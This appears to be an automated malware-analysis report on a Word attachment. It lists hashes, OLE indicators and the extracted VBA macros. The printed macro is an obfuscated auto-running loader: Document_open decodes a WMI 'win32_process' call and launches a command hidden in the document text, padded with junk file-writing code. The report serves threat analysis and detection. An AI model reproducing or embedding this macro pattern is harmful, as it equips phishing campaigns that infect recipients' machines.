Preview:	<!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site \| Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Argentina Pass Adaptive transitional override payment haptic Handcrafted Cotton Towels, Author: Jade Clement, Template: Normal.dotm, Last Saved By: Jade Moreau, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 5 10:15:00 2021, Last Saved Time/Date: Tue Jan 5 10:15:00 2021, Number of Pages: 1, Number of Words: 2640, Number of Characters: 15049, Security: 8
Entropy (8bit):	6.7084953616032434
TrID:	Microsoft Word document (32009/1) 79.99% Generic OLE2 / Multistream Compound File (8008/1) 20.01%
File name:	MAIL-0573188.doc
File size:	169983
MD5:	7ad5e41d03b2dfe72af417fa5b0cc164
SHA1:	2a6c0fa93aba9ce560d271ce65d79db69422fc6c
SHA256:	2d6cbcbc803638a13705a3b26afb3b34b72bc58601215566ba858c62882b8e61
SHA512:	83bc8a65c0316660f42a6d3cd4ed7e7432dd939ffa4b408f1f40d59cf2c7a842271a19b21308d5bc56de0ff382b9db7e8e05ff159e332588e02ca50b762a4ca8
SSDEEP:	3072:4D9ufstRUUKSns8T00JSHUgteMJ8qMD7gm:4D9ufsfgIf0pLm
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "MAIL-0573188.doc"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Title:
Subject:	Argentina Pass Adaptive transitional override payment haptic Handcrafted Cotton Towels
Author:	Jade Clement
Keywords:
Comments:
Template:	Normal.dotm
Last Saved By:	Jade Moreau
Revion Number:	1
Total Edit Time:	0
Create Time:	2021-01-05 10:15:00
Last Saved Time:	2021-01-05 10:15:00
Number of Pages:	1
Number of Words:	2640
Number of Characters:	15049
Creating Application:	Microsoft Office Word
Security:	8

Document Summary
Document Code Page:	-535
Number of Lines:	125
Number of Paragraphs:	35
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	917504

Streams with VBA

VBA File Name: A5gd21klfqu9c6rs, Stream Size: 1117

General
Stream Path:	Macros/VBA/A5gd21klfqu9c6rs
VBA File Name:	A5gd21klfqu9c6rs
Stream Size:	1117
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 49 85 f4 e6 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
Private
VB_Exposed
Attribute
VB_Creatable
VB_Name
Document_open()
VB_Customizable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_TemplateDerived

VBA Code

Attribute VB_Name = "A5gd21klfqu9c6rs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
G8xesq0b8jlsfrsp
End Sub

VBA File Name: Owppnp8hah4xo788, Stream Size: 17915

General
Stream Path:	Macros/VBA/Owppnp8hah4xo788
VBA File Name:	Owppnp8hah4xo788
Stream Size:	17915
Data ASCII:	. . . . . . . . . \| . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . I . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 7c 06 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 83 06 00 00 a3 30 00 00 00 00 00 00 01 00 00 00 49 85 65 07 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
DpYbmDA
oAaNlB
vrYYHIDxI
WTbkNqFa
Object
RjiQHRA
"bBmgOCvPPojGGC"
MNihxICY
DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
GfRPP
tWcKo
OMZxxg
"lwWhZGEasjsS"
"deVdMyoREdgzCaJb"
fDZVKAAc:
uWZkeMFv.WriteLine
xLQtMd
nleaHR
gEcrV:
"OyFBLhlWUnD"
uWZkeMFv.Close
xsruLB
zDsRaIBGF
mgrwfmN
"XZzpBRpDKuMgsGHIHF"
"VrVKCjefsIJ"
pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
SblcDCC:
SQQWY
"hbtzFRJEXyDCXI"
iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
sCOIGDtD:
gxBPJB
jbUmDI
DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
"BnxHFzJCGhVHrFIm"
IcAHwPH
iFTmFHFH
STzBjwICv
kwzjKvZHe
fDZVKAAc.WriteLine
plqkuDI
RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
ZMdrVHGz:
SeHafBC
nhLeJMLfI
EISYDDB
EhCMG
UDSpFHqFJ
WlBWDXGD
"NisSEYrcDlKQUITa"
"dXFPCSYtSNB"
"NeiIGCNWgICn"
OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
mgrwfmN.Close
YVZXECEHD
FLtYjKHC
GfRPP.Close
idbaDIr
"dnUnKFHAkIOdD"
"nJJzFRjEWpRikxCD"
ANzGyzCD
MmSDYCkJR
"hKlajOujwgDFAA"
"eeVVJBMGlcfXMB"
RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
iHKuDmaEr:
"CcDmClHsnCC"
"UjBKOEDRIbiWFB"
QOrvJEB
"sxbwAfRtWJI"
UskmBJF
"KqVyuQQfwTWh"
tpOgXmm
fiyQuiRBI
gphNDVZp
vEBqHrDnD
PbhYVsA.Close
ZMdrVHGz.Close
"vVbvIHcFGEAJJ"
CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
KmGOADt
Resume
phIwFD
jPJENIo
AiRdGDAJ
KmGOADt.Close
"]an"
PnolTIbAB
"eEWdaDQVJJqTHgF"
gxBPJB:
eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
FYVZFEH
tzErBRFe
"LvnHAGHfIhRDBRAF"
NuebA:
sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
oQgLUI
SblcDCC.Close
HCvCmAcHC
"eXpjHFapHaPdRJu"
eepvDEaE
"DBvMcNtCcMyJDDI"
MHYlQAD
"ekluIEBJFIgoBcGC"
dXiwA
"MiCjaGqJfPrI"
eCIzUDyJ
RyDBDK
hFSyAfFrF
"fDdPHEjBEnAdZqZFJ"
zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
"MxCpGaGqBgemCAFEJ"
PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
sCOIGDtD.Close
uWZkeMFv
gzTFLxb
IePCGy
swNGWdd
qHKYGHlFA
OIbfvEEFF
CHVmaVC
ZMdrVHGz
TXmxvp
quDoH
iHKuDmaEr.WriteLine
KXTliE
ddanFDWJf
rJEkbLH
fNhiCVgGS:
noebIvSiu
YZllAeRe
VB_Name
"eXObOTlBAITEOIo"
mgrwfmN:
LzxxRHG
inIcjJtaF
EKmLA
uVItICICB
mgrwfmN.WriteLine
KXwaABT
fDZVKAAc.Close
Mid(Application.Name,
fmwdEMADQ
lBenBDA
SblcDCC
mgTNFCq
NuebA.WriteLine
hXxQDACJA
KmGOADt.WriteLine
HCvCmAcHC.Close
yJmmmVIAG
rYbgBh:
iHKuDmaEr.Close
NuebA.Close
hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
ZMdrVHGz.WriteLine
OlapGi
zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
"CVbRCAAhkhmcDG"
HCvCmAcHC:
BNmrm
rYbgBh
"WNFUDvHgghFdup"
uRnkDGJ
"qiXBsMBsLJGbX"
yabVbA
zBSWCKmJv
bbsIZ
"zdTcdOoXXUFHJK"
xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
RqlOZAHRJ
fNhiCVgGS.WriteLine
hjZwD
"EgxfIDVQbJotWhj"
"BUUJYAAIoJvLBLAo"
PcHRGIADo
wTMSLyWFG
sCOIGDtD
PbhYVsA:
"BndJDkuVYF"
KmGOADt:
"RhnJRGeBNASBQHHGF"
anyPG
"JTSPCDjykfL"
sreXHFD
"XrrAwQZPjqB"
hoyzuBGCP
UavHTIBHo
qAUhkIMz
EKezHIC
PjNhJNA
GznGGHyG
UwyYSBsBN
ORLICIl
cwsTFPCH
"]anw["
drZcHkCm
hDJDJ
NXbmIuHX
Function
"syYTHJShrguhzb"
AioOpBFE
xiFRA
fmwdEMADQ.WriteLine
gxBPJB.Close
NZiApKAp
gEcrV.Close
"mehEFPFHcklgJDDx"
iHKuDmaEr
pULquU
SblcDCC.WriteLine
pkixJADG:
xkQqDXCcD
GIAKA
"TubioGUTLadgXbA"
"anBQXljzGenE"
xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
fDZVKAAc
ecGmY
"ptABFEZDmkMVIeD"
"TBKmUCEXTUIGu"
"fxSJajCGlWUEBW"
rYbgBh.WriteLine
DhnHIY
sCOIGDtD.WriteLine
tAmQHxlD
tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
"wypNISsWSXthFJCq"
eLmLDU
jENfzNH
gEcrV.WriteLine
Nothing
"uTtCAFwHpCGF"
PbhYVsA
gEcrV
NuebA
"aqGiHISIbAoabV"
fNhiCVgGS.Close
jsYAGBJAF
RhztCF
lADFBaJ
FUyIHBDFz
sPkIwu
ViWsSIH
gxBPJB.WriteLine
zZuzBZGD
pkixJADG.WriteLine
MznOjBB
fmwdEMADQ.Close
sTzDC
"oLweAMoGsqVE"
diCXTi
GfRPP.WriteLine
Error
uWZkeMFv:
xPBGH
Attribute
sySRJ
"WLXLJnjItPGPZJ"
"JMgUDAIEJlgyNBH"
jzqBlGW
CFdSBD
pkixJADG.Close
ibIiBF
"qDaYIDDSZQMTaO"
pkixJADG
GfRPP:
LQqlBAHD
dLRiF
"ImJJdfAtdFHCh"
PbhYVsA.WriteLine
DkLoDL
RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
fNhiCVgGS
fmwdEMADQ:
rYbgBh.Close
zxgLHJSFW
HCvCmAcHC.WriteLine
hZCth

VBA Code

Attribute VB_Name = "Owppnp8hah4xo788"
Function G8xesq0b8jlsfrsp()
On Error Resume Next
Dhubl2is48jort = "Jsnt2t9fi0a8nnsiaf" + "Bete9x47doew46v"
sf4 = Zw1k7hcmdl66 + A5gd21klfqu9c6rs.StoryRanges.Item(2 / 2) + Hyii7r76oq89
   GoTo SblcDCC
Dim pULquU As Object
Set ibIiBF = diCXTi
Set pULquU = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim SblcDCC As Object
Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
SblcDCC.WriteLine "VrVKCjefsIJ"
SblcDCC.WriteLine "sxbwAfRtWJI"
SblcDCC.WriteLine "WLXLJnjItPGPZJ"
Set jbUmDI = NZiApKAp
SblcDCC.Close
Set pULquU = Nothing
Set MznOjBB = vrYYHIDxI
Set SblcDCC = Nothing
SblcDCC:
t3s = "]anw[3" + "p]anw[3"
K50yjh8o6l7s = "]an" + "w[3ro]anw[3]a" + "nw[3ce]anw[3s]anw[3s]anw[3]anw[3"
   GoTo fNhiCVgGS
Dim RyDBDK As Object
Set WTbkNqFa = gzTFLxb
Set RyDBDK = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim fNhiCVgGS As Object
Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
fNhiCVgGS.WriteLine "ImJJdfAtdFHCh"
fNhiCVgGS.WriteLine "deVdMyoREdgzCaJb"
fNhiCVgGS.WriteLine "XZzpBRpDKuMgsGHIHF"
Set OlapGi = PjNhJNA
fNhiCVgGS.Close
Set RyDBDK = Nothing
Set yabVbA = oAaNlB
Set fNhiCVgGS = Nothing
fNhiCVgGS:
Brlo236t2rmfu = "]anw[3:w]anw[3]anw[3i" + "n]anw[33]anw[32]anw[3_]anw[3"
   GoTo HCvCmAcHC
Dim iFTmFHFH As Object
Set UDSpFHqFJ = sySRJ
Set iFTmFHFH = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim HCvCmAcHC As Object
Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
HCvCmAcHC.WriteLine "uTtCAFwHpCGF"
HCvCmAcHC.WriteLine "lwWhZGEasjsS"
HCvCmAcHC.WriteLine "MiCjaGqJfPrI"
Set MmSDYCkJR = UwyYSBsBN
HCvCmAcHC.Close
Set iFTmFHFH = Nothing
Set EISYDDB = tpOgXmm
Set HCvCmAcHC = Nothing
HCvCmAcHC:
Iogna_9cq5gv = "w]anw[3in]anw[3m]an" + "w[3gm]anw[3t]anw[3]anw[3"
   GoTo gEcrV
Dim RqlOZAHRJ As Object
Set jsYAGBJAF = MHYlQAD
Set RqlOZAHRJ = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim gEcrV As Object
Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
gEcrV.WriteLine "dXFPCSYtSNB"
gEcrV.WriteLine "KqVyuQQfwTWh"
gEcrV.WriteLine "qDaYIDDSZQMTaO"
Set IePCGy = GznGGHyG
gEcrV.Close
Set RqlOZAHRJ = Nothing
Set cwsTFPCH = bbsIZ
Set gEcrV = Nothing
gEcrV:
Fo4b_d8mj9usjgaha = "]anw[3" + "]anw[3" + Mid(Application.Name, 4 + 2, 2 - 1) + "]anw[" + "3]anw[3"
   GoTo ZMdrVHGz
Dim xsruLB As Object
Set fiyQuiRBI = swNGWdd
Set xsruLB = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim ZMdrVHGz As Object
Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
ZMdrVHGz.WriteLine "MxCpGaGqBgemCAFEJ"
ZMdrVHGz.WriteLine "hbtzFRJEXyDCXI"
ZMdrVHGz.WriteLine "zdTcdOoXXUFHJK"
Set xPBGH = rJEkbLH
ZMdrVHGz.Close
Set xsruLB = Nothing
Set dLRiF = vEBqHrDnD
Set ZMdrVHGz = Nothing
ZMdrVHGz:
K427k3xfk130n18n = Iogna_9cq5gv + Fo4b_d8mj9usjgaha + Brlo236t2rmfu + t3s + K50yjh8o6l7s
   GoTo fDZVKAAc
Dim tzErBRFe As Object
Set SeHafBC = tWcKo
Set tzErBRFe = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim fDZVKAAc As Object
Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
fDZVKAAc.WriteLine "hKlajOujwgDFAA"
fDZVKAAc.WriteLine "JMgUDAIEJlgyNBH"
fDZVKAAc.WriteLine "BUUJYAAIoJvLBLAo"
Set CHVmaVC = LzxxRHG
fDZVKAAc.Close
Set tzErBRFe = Nothing
Set WlBWDXGD = EKezHIC
Set fDZVKAAc = Nothing
fDZVKAAc:
Lutf6_3d403q9 = Jlda77h_v8nx5(K427k3xfk130n18n)
   GoTo rYbgBh
Dim hZCth As Object
Set LQqlBAHD = DpYbmDA
Set hZCth = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim rYbgBh As Object
Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
rYbgBh.WriteLine "CVbRCAAhkhmcDG"
rYbgBh.WriteLine "XrrAwQZPjqB"
rYbgBh.WriteLine "fxSJajCGlWUEBW"
Set phIwFD = hDJDJ
rYbgBh.Close
Set hZCth = Nothing
Set PnolTIbAB = dXiwA
Set rYbgBh = Nothing
rYbgBh:
Set Mwzin4vxc1irit = CreateObject(Lutf6_3d403q9)
   GoTo GfRPP
Dim xLQtMd As Object
Set uRnkDGJ = hFSyAfFrF
Set xLQtMd = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim GfRPP As Object
Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
GfRPP.WriteLine "qiXBsMBsLJGbX"
GfRPP.WriteLine "mehEFPFHcklgJDDx"
GfRPP.WriteLine "BndJDkuVYF"
Set xiFRA = hXxQDACJA
GfRPP.Close
Set xLQtMd = Nothing
Set jENfzNH = xkQqDXCcD
Set GfRPP = Nothing
GfRPP:
Jaaqx1xn5daotw = Mid(sf4, (1 + 4), Len(sf4))
   GoTo sCOIGDtD
Dim eepvDEaE As Object
Set jzqBlGW = lBenBDA
Set eepvDEaE = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim sCOIGDtD As Object
Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
sCOIGDtD.WriteLine "JTSPCDjykfL"
sCOIGDtD.WriteLine "bBmgOCvPPojGGC"
sCOIGDtD.WriteLine "anBQXljzGenE"
Set tAmQHxlD = UavHTIBHo
sCOIGDtD.Close
Set eepvDEaE = Nothing
Set gphNDVZp = IcAHwPH
Set sCOIGDtD = Nothing
sCOIGDtD:
   GoTo fmwdEMADQ
Dim DkLoDL As Object
Set plqkuDI = BNmrm
Set DkLoDL = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim fmwdEMADQ As Object
Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
fmwdEMADQ.WriteLine "dnUnKFHAkIOdD"
fmwdEMADQ.WriteLine "ekluIEBJFIgoBcGC"
fmwdEMADQ.WriteLine "BnxHFzJCGhVHrFIm"
Set jPJENIo = FLtYjKHC
fmwdEMADQ.Close
Set DkLoDL = Nothing
Set ANzGyzCD = qAUhkIMz
Set fmwdEMADQ = Nothing
fmwdEMADQ:
Mwzin4vxc1irit.Create Jlda77h_v8nx5(Jaaqx1xn5daotw), V2enhc4htwl7z6bh, Thriap3q9rgf3yy9y
   GoTo pkixJADG
Dim DhnHIY As Object
Set oQgLUI = zZuzBZGD
Set DhnHIY = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim pkixJADG As Object
Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
pkixJADG.WriteLine "fDdPHEjBEnAdZqZFJ"
pkixJADG.WriteLine "wypNISsWSXthFJCq"
pkixJADG.WriteLine "LvnHAGHfIhRDBRAF"
Set ecGmY = OIbfvEEFF
pkixJADG.Close
Set DhnHIY = Nothing
Set EKmLA = eLmLDU
Set pkixJADG = Nothing
pkixJADG:
   GoTo KmGOADt
Dim CFdSBD As Object
Set nhLeJMLfI = FYVZFEH
Set CFdSBD = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim KmGOADt As Object
Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
KmGOADt.WriteLine "DBvMcNtCcMyJDDI"
KmGOADt.WriteLine "eXpjHFapHaPdRJu"
KmGOADt.WriteLine "eXObOTlBAITEOIo"
Set STzBjwICv = hoyzuBGCP
KmGOADt.Close
Set CFdSBD = Nothing
Set ORLICIl = lADFBaJ
Set KmGOADt = Nothing
KmGOADt:
End Function
Function Jlda77h_v8nx5(Wwsqkhmtfcf3_y)
On Error Resume Next
   GoTo PbhYVsA
Dim PcHRGIADo As Object
Set TXmxvp = SQQWY
Set PcHRGIADo = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim PbhYVsA As Object
Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
PbhYVsA.WriteLine "eEWdaDQVJJqTHgF"
PbhYVsA.WriteLine "OyFBLhlWUnD"
PbhYVsA.WriteLine "TBKmUCEXTUIGu"
Set qHKYGHlFA = ddanFDWJf
PbhYVsA.Close
Set PcHRGIADo = Nothing
Set sPkIwu = RhztCF
Set PbhYVsA = Nothing
PbhYVsA:
Gqzsjl136wugk27i9 = Wwsqkhmtfcf3_y
   GoTo NuebA
Dim sTzDC As Object
Set GIAKA = kwzjKvZHe
Set sTzDC = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim NuebA As Object
Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
NuebA.WriteLine "NeiIGCNWgICn"
NuebA.WriteLine "EgxfIDVQbJotWhj"
NuebA.WriteLine "UjBKOEDRIbiWFB"
Set idbaDIr = inIcjJtaF
NuebA.Close
Set sTzDC = Nothing
Set KXwaABT = zBSWCKmJv
Set NuebA = Nothing
NuebA:
Gnc9qzz9241pnhfi = Hrs2a1p95u19(Gqzsjl136wugk27i9)
   GoTo gxBPJB
Dim zxgLHJSFW As Object
Set quDoH = KXTliE
Set zxgLHJSFW = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim gxBPJB As Object
Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
gxBPJB.WriteLine "RhnJRGeBNASBQHHGF"
gxBPJB.WriteLine "WNFUDvHgghFdup"
gxBPJB.WriteLine "eeVVJBMGlcfXMB"
Set nleaHR = YZllAeRe
gxBPJB.Close
Set zxgLHJSFW = Nothing
Set mgTNFCq = hjZwD
Set gxBPJB = Nothing
gxBPJB:
Jlda77h_v8nx5 = Gnc9qzz9241pnhfi
   GoTo mgrwfmN
Dim RjiQHRA As Object
Set EhCMG = FUyIHBDFz
Set RjiQHRA = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim mgrwfmN As Object
Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
mgrwfmN.WriteLine "ptABFEZDmkMVIeD"
mgrwfmN.WriteLine "vVbvIHcFGEAJJ"
mgrwfmN.WriteLine "NisSEYrcDlKQUITa"
Set MNihxICY = AiRdGDAJ
mgrwfmN.Close
Set RjiQHRA = Nothing
Set wTMSLyWFG = AioOpBFE
Set mgrwfmN = Nothing
mgrwfmN:
End Function
Function Hrs2a1p95u19(Svk60sycz63sk)
Q491417n8n1 = Pg5minli2d3c9
   GoTo uWZkeMFv
Dim zDsRaIBGF As Object
Set ViWsSIH = sreXHFD
Set zDsRaIBGF = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim uWZkeMFv As Object
Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
uWZkeMFv.WriteLine "CcDmClHsnCC"
uWZkeMFv.WriteLine "aqGiHISIbAoabV"
uWZkeMFv.WriteLine "nJJzFRjEWpRikxCD"
Set QOrvJEB = eCIzUDyJ
uWZkeMFv.Close
Set zDsRaIBGF = Nothing
Set UskmBJF = yJmmmVIAG
Set uWZkeMFv = Nothing
uWZkeMFv:
Hrs2a1p95u19 = Replace(Svk60sycz63sk, "]a" + "nw[3", Ij2hesgjee57d3s0)
   GoTo iHKuDmaEr
Dim OMZxxg As Object
Set drZcHkCm = uVItICICB
Set OMZxxg = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim iHKuDmaEr As Object
Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
iHKuDmaEr.WriteLine "syYTHJShrguhzb"
iHKuDmaEr.WriteLine "TubioGUTLadgXbA"
iHKuDmaEr.WriteLine "oLweAMoGsqVE"
Set noebIvSiu = anyPG
iHKuDmaEr.Close
Set OMZxxg = Nothing
Set NXbmIuHX = YVZXECEHD
Set iHKuDmaEr = Nothing
iHKuDmaEr:
End Function

VBA File Name: Zdjtk46nm17voo, Stream Size: 701

General
Stream Path:	Macros/VBA/Zdjtk46nm17voo
VBA File Name:	Zdjtk46nm17voo
Stream Size:	701
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . I . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
